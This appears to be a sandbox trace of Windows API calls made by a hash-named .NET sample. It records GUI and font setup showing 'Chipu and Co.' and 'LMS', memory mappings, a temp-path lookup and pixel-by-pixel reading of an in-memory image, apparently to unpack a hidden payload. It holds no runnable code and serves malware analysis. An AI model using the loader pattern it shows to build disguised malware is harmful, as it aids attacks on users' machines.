[0088.959] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x1370000, lpParam=0x0) returned 0x70060
[0088.961] NtdllDefWindowProc_W () returned 0x1
[0088.966] NtdllDefWindowProc_W () returned 0x0
[0088.966] NtdllDefWindowProc_W () returned 0x0
[0088.966] NtdllDefWindowProc_W () returned 0x0
[0088.966] NtdllDefWindowProc_W () returned 0x0
[0088.973] GetSysColor (nIndex=10) returned 0xb4b4b4
[0088.973] GetSysColor (nIndex=2) returned 0xd1b499
[0088.973] GetSysColor (nIndex=9) returned 0x0
[0088.973] GetSysColor (nIndex=12) returned 0xababab
[0088.973] GetSysColor (nIndex=15) returned 0xf0f0f0
[0088.973] GetSysColor (nIndex=20) returned 0xffffff
[0088.973] GetSysColor (nIndex=16) returned 0xa0a0a0
[0088.973] GetSysColor (nIndex=15) returned 0xf0f0f0
[0088.974] GetSysColor (nIndex=16) returned 0xa0a0a0
[0088.974] GetSysColor (nIndex=21) returned 0x696969
[0088.974] GetSysColor (nIndex=22) returned 0xe3e3e3
[0088.974] GetSysColor (nIndex=20) returned 0xffffff
[0088.974] GetSysColor (nIndex=18) returned 0x0
[0088.974] GetSysColor (nIndex=1) returned 0x0
[0088.974] GetSysColor (nIndex=27) returned 0xead1b9
[0088.974] GetSysColor (nIndex=28) returned 0xf2e4d7
[0088.974] GetSysColor (nIndex=17) returned 0x6d6d6d
[0088.974] GetSysColor (nIndex=13) returned 0xff9933
[0088.974] GetSysColor (nIndex=14) returned 0xffffff
[0088.974] GetSysColor (nIndex=26) returned 0xcc6600
[0088.975] GetSysColor (nIndex=11) returned 0xfcf7f4
[0088.975] GetSysColor (nIndex=3) returned 0xdbcdbf
[0088.975] GetSysColor (nIndex=19) returned 0x544e43
[0088.975] GetSysColor (nIndex=24) returned 0xe1ffff
[0088.975] GetSysColor (nIndex=23) returned 0x0
[0088.975] GetSysColor (nIndex=4) returned 0xf0f0f0
[0088.975] GetSysColor (nIndex=30) returned 0xf0f0f0
[0088.975] GetSysColor (nIndex=29) returned 0xff9933
[0088.975] GetSysColor (nIndex=7) returned 0x0
[0088.975] GetSysColor (nIndex=0) returned 0xc8c8c8
[0088.975] GetSysColor (nIndex=5) returned 0xffffff
[0088.975] GetSysColor (nIndex=6) returned 0x646464
[0088.975] GetSysColor (nIndex=8) returned 0x0
[0088.976] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e9d8) returned 1
[0088.979] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.979] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.984] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.985] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9d8) returned 1
[0088.987] GetCurrentThreadId () returned 0xf64
[0088.987] GetCurrentThreadId () returned 0xf64
[0088.987] GetCurrentThreadId () returned 0xf64
[0088.987] GetCurrentThreadId () returned 0xf64
[0088.987] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e9d8) returned 1
[0088.987] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e9d8) returned 1
[0088.991] AdjustWindowRectEx (in: lpRect=0x17e888, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e888) returned 1
[0088.992] GdipGetFamilyName (in: family=0x657f6b0, name=0x17e850, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0088.994] CreateCompatibleDC (hdc=0x0) returned 0x14010b69
[0088.996] GetCurrentObject (hdc=0x14010b69, type=0x1) returned 0x1b00017
[0088.996] GetCurrentObject (hdc=0x14010b69, type=0x2) returned 0x1900010
[0088.996] GetCurrentObject (hdc=0x14010b69, type=0x7) returned 0x185000f
[0088.996] GetCurrentObject (hdc=0x14010b69, type=0x6) returned 0x18a002e
[0088.998] SaveDC (hdc=0x14010b69) returned 1
[0088.999] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.001] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.001] CreateFontIndirectW (lplf=0x68b888) returned 0xe0a01d2
[0089.001] CoTaskMemFree (pv=0x68b888)
[0089.001] GetObjectW (in: h=0xe0a01d2, c=92, pv=0x17e814 | out: pv=0x17e814) returned 92
[0089.006] GetCurrentObject (hdc=0x14010b69, type=0x6) returned 0x18a002e
[0089.006] GetObjectW (in: h=0x18a002e, c=92, pv=0x17e804 | out: pv=0x17e804) returned 92
[0089.007] SelectObject (hdc=0x14010b69, h=0xe0a01d2) returned 0x18a002e
[0089.011] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x288fbcc | out: psizl=0x288fbcc) returned 1
[0089.028] AdjustWindowRectEx (in: lpRect=0x17e960, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e960) returned 1
[0089.030] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x17ea28) returned 0x0
[0089.031] GdipCreateFont (fontFamily=0x4fccf58, emSize=0x417c0000, style=1, unit=0x3, font=0x288fcc0) returned 0x0
[0089.031] GdipGetFontSize (font=0x74e0e90, size=0x288fcc4) returned 0x0
[0089.032] AdjustWindowRectEx (in: lpRect=0x17e840, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e840) returned 1
[0089.032] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e808, language=0x409 | out: name="Arial") returned 0x0
[0089.033] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.033] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.033] CreateFontIndirectW (lplf=0x68b888) returned 0xa0a0b67
[0089.033] CoTaskMemFree (pv=0x68b888)
[0089.033] GetObjectW (in: h=0xa0a0b67, c=92, pv=0x17e7cc | out: pv=0x17e7cc) returned 92
[0089.033] SelectObject (hdc=0x14010b69, h=0xa0a0b67) returned 0xe0a01d2
[0089.037] DeleteObject (ho=0xe0a01d2) returned 1
[0089.037] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x288ff74 | out: psizl=0x288ff74) returned 1
[0089.042] AdjustWindowRectEx (in: lpRect=0x17e918, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e918) returned 1
[0089.043] AdjustWindowRectEx (in: lpRect=0x17e874, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e874) returned 1
[0089.043] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e83c, language=0x409 | out: name="Arial") returned 0x0
[0089.043] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.043] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.043] CreateFontIndirectW (lplf=0x68b888) returned 0xf0a01d2
[0089.044] CoTaskMemFree (pv=0x68b888)
[0089.044] GetObjectW (in: h=0xf0a01d2, c=92, pv=0x17e800 | out: pv=0x17e800) returned 92
[0089.046] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x2890178 | out: psizl=0x2890178) returned 1
[0089.046] DeleteObject (ho=0xf0a01d2) returned 1
[0089.047] AdjustWindowRectEx (in: lpRect=0x17e9ac, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9ac) returned 1
[0089.047] AdjustWindowRectEx (in: lpRect=0x17e874, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e874) returned 1
[0089.047] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e83c, language=0x409 | out: name="Arial") returned 0x0
[0089.047] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.047] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.047] CreateFontIndirectW (lplf=0x68b888) returned 0x100a01d2
[0089.047] CoTaskMemFree (pv=0x68b888)
[0089.047] GetObjectW (in: h=0x100a01d2, c=92, pv=0x17e800 | out: pv=0x17e800) returned 92
[0089.047] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x289036c | out: psizl=0x289036c) returned 1
[0089.048] DeleteObject (ho=0x100a01d2) returned 1
[0089.048] AdjustWindowRectEx (in: lpRect=0x17e84c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e84c) returned 1
[0089.053] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e738, language=0x409 | out: name="Arial") returned 0x0
[0089.054] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.054] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.054] CreateFontIndirectW (lplf=0x68b888) returned 0x110a01d2
[0089.054] CoTaskMemFree (pv=0x68b888)
[0089.054] GetObjectW (in: h=0x110a01d2, c=92, pv=0x17e6fc | out: pv=0x17e6fc) returned 92
[0089.067] GetMapMode (hdc=0x14010b69) returned 1
[0089.067] GetTextMetricsW (in: hdc=0x14010b69, lptm=0x17e72c | out: lptm=0x17e72c) returned 1
[0089.070] DrawTextExW (in: hdc=0x14010b69, lpchText="Chipu and Co.", cchText=13, lprc=0x17e838, format=0x2400, lpdtp=0x2890610 | out: lpchText="Chipu and Co.", lprc=0x17e838) returned 24
[0089.117] AdjustWindowRectEx (in: lpRect=0x17e924, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e924) returned 1
[0089.140] AdjustWindowRectEx (in: lpRect=0x17e888, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e888) returned 1
[0089.140] GdipGetFamilyName (in: family=0x657f6b0, name=0x17e850, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0089.140] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.140] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.141] CreateFontIndirectW (lplf=0x68b888) returned 0x230a07cb
[0089.141] CoTaskMemFree (pv=0x68b888)
[0089.141] GetObjectW (in: h=0x230a07cb, c=92, pv=0x17e814 | out: pv=0x17e814) returned 92
[0089.141] SelectObject (hdc=0x14010b69, h=0x230a07cb) returned 0xa0a0b67
[0089.141] DeleteObject (ho=0xa0a0b67) returned 1
[0089.141] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x28918b4 | out: psizl=0x28918b4) returned 1
[0089.142] AdjustWindowRectEx (in: lpRect=0x17e960, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e960) returned 1
[0089.142] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x17ea28) returned 0x0
[0089.142] GdipCreateFont (fontFamily=0x4fccf58, emSize=0x417c0000, style=1, unit=0x3, font=0x28919d4) returned 0x0
[0089.142] GdipGetFontSize (font=0x74e0eb8, size=0x28919d8) returned 0x0
[0089.142] AdjustWindowRectEx (in: lpRect=0x17e840, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e840) returned 1
[0089.143] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e808, language=0x409 | out: name="Arial") returned 0x0
[0089.143] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.143] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.143] CreateFontIndirectW (lplf=0x68b888) returned 0xb0a0b67
[0089.143] CoTaskMemFree (pv=0x68b888)
[0089.143] GetObjectW (in: h=0xb0a0b67, c=92, pv=0x17e7cc | out: pv=0x17e7cc) returned 92
[0089.143] SelectObject (hdc=0x14010b69, h=0xb0a0b67) returned 0x230a07cb
[0089.143] DeleteObject (ho=0x230a07cb) returned 1
[0089.144] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x2891c40 | out: psizl=0x2891c40) returned 1
[0089.144] AdjustWindowRectEx (in: lpRect=0x17e918, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e918) returned 1
[0089.144] AdjustWindowRectEx (in: lpRect=0x17e874, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e874) returned 1
[0089.144] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e83c, language=0x409 | out: name="Arial") returned 0x0
[0089.144] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.144] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.144] CreateFontIndirectW (lplf=0x68b888) returned 0x240a07cb
[0089.145] CoTaskMemFree (pv=0x68b888)
[0089.145] GetObjectW (in: h=0x240a07cb, c=92, pv=0x17e800 | out: pv=0x17e800) returned 92
[0089.145] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x2891e38 | out: psizl=0x2891e38) returned 1
[0089.145] DeleteObject (ho=0x240a07cb) returned 1
[0089.146] AdjustWindowRectEx (in: lpRect=0x17e9ac, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e9ac) returned 1
[0089.146] AdjustWindowRectEx (in: lpRect=0x17e874, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e874) returned 1
[0089.146] GdipGetFamilyName (in: family=0x4fccf58, name=0x17e83c, language=0x409 | out: name="Arial") returned 0x0
[0089.147] GetDeviceCaps (hdc=0x14010b69, index=90) returned 96
[0089.147] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.147] CreateFontIndirectW (lplf=0x68b888) returned 0x250a07cb
[0089.147] CoTaskMemFree (pv=0x68b888)
[0089.147] GetObjectW (in: h=0x250a07cb, c=92, pv=0x17e800 | out: pv=0x17e800) returned 92
[0089.147] GetTextExtentPoint32W (in: hdc=0x14010b69, lpString="0", c=1, psizl=0x2892038 | out: psizl=0x2892038) returned 1
[0089.147] DeleteObject (ho=0x250a07cb) returned 1
[0089.147] AdjustWindowRectEx (in: lpRect=0x17e84c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e84c) returned 1
[0089.148] DrawTextExW (in: hdc=0x14010b69, lpchText="LMS", cchText=3, lprc=0x17e838, format=0x2400, lpdtp=0x28920c4 | out: lpchText="LMS", lprc=0x17e838) returned 24
[0089.148] AdjustWindowRectEx (in: lpRect=0x17e924, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e924) returned 1
[0089.148] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e9d8) returned 1
[0089.148] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e9d8) returned 1
[0089.150] AdjustWindowRectEx (in: lpRect=0x17ea0c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x17ea0c) returned 1
[0089.150] GetSystemMetrics (nIndex=59) returned 1460
[0089.150] GetSystemMetrics (nIndex=60) returned 920
[0089.150] GetSystemMetrics (nIndex=34) returned 132
[0089.150] GetSystemMetrics (nIndex=35) returned 38
[0089.150] AdjustWindowRectEx (in: lpRect=0x17e90c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x17e90c) returned 1
[0089.150] GetCurrentThreadId () returned 0xf64
[0089.150] GetCurrentThreadId () returned 0xf64
[0089.151] GetCurrentThreadId () returned 0xf64
[0089.151] GetCurrentThreadId () returned 0xf64
[0089.151] GetCurrentThreadId () returned 0xf64
[0089.151] GetCurrentThreadId () returned 0xf64
[0089.153] CreateCompatibleDC (hdc=0x0) returned 0x260107cb
[0089.155] GetDC (hWnd=0x0) returned 0x4f010681
[0089.155] GdipCreateFromHDC (hdc=0x4f010681, graphics=0x17e848) returned 0x0
[0089.156] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.156] GdipGetLogFontW (font=0x74e0e68, graphics=0x7414d48, logfontW=0x68b888) returned 0x0
[0089.157] CoTaskMemFree (pv=0x68b888)
[0089.157] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.157] CoTaskMemFree (pv=0x68b888)
[0089.157] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.157] CoTaskMemFree (pv=0x68b888)
[0089.157] GdipDeleteGraphics (graphics=0x7414d48) returned 0x0
[0089.157] ReleaseDC (hWnd=0x0, hDC=0x4f010681) returned 1
[0089.158] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0089.158] CreateFontIndirectW (lplf=0x68b888) returned 0x190a0b41
[0089.158] CoTaskMemFree (pv=0x68b888)
[0089.159] SelectObject (hdc=0x260107cb, h=0x190a0b41) returned 0x18a002e
[0089.159] GetTextMetricsW (in: hdc=0x260107cb, lptm=0x17e954 | out: lptm=0x17e954) returned 1
[0089.159] GetTextExtentPoint32W (in: hdc=0x260107cb, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x2892584 | out: psizl=0x2892584) returned 1
[0089.159] SelectObject (hdc=0x260107cb, h=0x18a002e) returned 0x190a0b41
[0089.160] DeleteDC (hdc=0x260107cb) returned 1
[0089.160] AdjustWindowRectEx (in: lpRect=0x17e934, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e934) returned 1
[0089.160] AdjustWindowRectEx (in: lpRect=0x17e798, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e798) returned 1
[0089.160] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.160] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.160] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e934, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e934) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e798, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e798) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e5b4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e5b4) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e8f8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e8f8) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e75c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e75c) returned 1
[0089.161] AdjustWindowRectEx (in: lpRect=0x17e5b4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17e5b4) returned 1
[0089.164] AdjustWindowRectEx (in: lpRect=0x17e6a8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x17e6a8) returned 1
[0089.164] AdjustWindowRectEx (in: lpRect=0x17e8cc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x17e8cc) returned 1
[0089.164] AdjustWindowRectEx (in: lpRect=0x17e620, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x17e620) returned 1
[0089.164] AdjustWindowRectEx (in: lpRect=0x17e704, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x17e704) returned 1
[0089.164] GetSystemMetrics (nIndex=34) returned 132
[0089.164] GetSystemMetrics (nIndex=35) returned 38
[0089.164] AdjustWindowRectEx (in: lpRect=0x17e88c, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e88c) returned 1
[0089.164] AdjustWindowRectEx (in: lpRect=0x17e6f0, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e6f0) returned 1
[0089.241] EtwEventRegister () returned 0x0
[0089.254] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x17e250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0089.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x17e498) returned 1
[0089.254] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x17e75c | out: lpFileInformation=0x17e75c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0089.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x17e494) returned 1
[0090.971] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa00, lpName=0x0) returned 0x24c
[0090.972] memcpy (in: _Dst=0x610000, _Src=0x28a5610, _Size=0xfa00 | out: _Dst=0x610000) returned 0x610000
[0090.973] CloseHandle (hObject=0x24c) returned 1
[0138.032] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e00, lpName=0x0) returned 0x174
[0138.033] memcpy (in: _Dst=0x8c0000, _Src=0x288b598, _Size=0x2e00 | out: _Dst=0x8c0000) returned 0x8c0000
[0138.034] CloseHandle (hObject=0x174) returned 1
[0138.063] CoTaskMemAlloc (cb=0x20c) returned 0x6bdb78
[0138.064] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x6bdb78 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0138.064] CoTaskMemFree (pv=0x6bdb78)
[0138.066] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x17d740, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0138.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x17d754, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0138.411] GdipLoadImageFromStream (stream=0x8d0030, image=0x17e150) returned 0x0
[0138.807] GdipImageForceValidation (image=0x7414d48) returned 0x0
[0138.828] GdipGetImageType (image=0x7414d48, type=0x17e14c) returned 0x0
[0138.829] GdipGetImageRawFormat (image=0x7414d48, format=0x17e0c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
[0138.861] GdipGetImageWidth (image=0x7414d48, width=0x17e708) returned 0x0
[0138.865] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.866] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.866] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=0, color=0x17e6f4) returned 0x0
[0138.867] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.867] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.867] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=1, color=0x17e6f4) returned 0x0
[0138.867] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.867] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.867] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=2, color=0x17e6f4) returned 0x0
[0138.868] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.868] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.868] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=3, color=0x17e6f4) returned 0x0
[0138.868] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.868] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.868] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=4, color=0x17e6f4) returned 0x0
[0138.868] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.868] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.868] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=5, color=0x17e6f4) returned 0x0
[0138.868] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.869] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.869] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=6, color=0x17e6f4) returned 0x0
[0138.869] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.869] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.869] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=7, color=0x17e6f4) returned 0x0
[0138.869] GdipGetImageWidth (image=0x7414d48, width=0x17e6e4) returned 0x0
[0138.869] GdipGetImageHeight (image=0x7414d48, height=0x17e6e4) returned 0x0
[0138.869] GdipBitmapGetPixel (bitmap=0x7414d48, x=0, y=8, color=0x17e6f4) returned 0x0
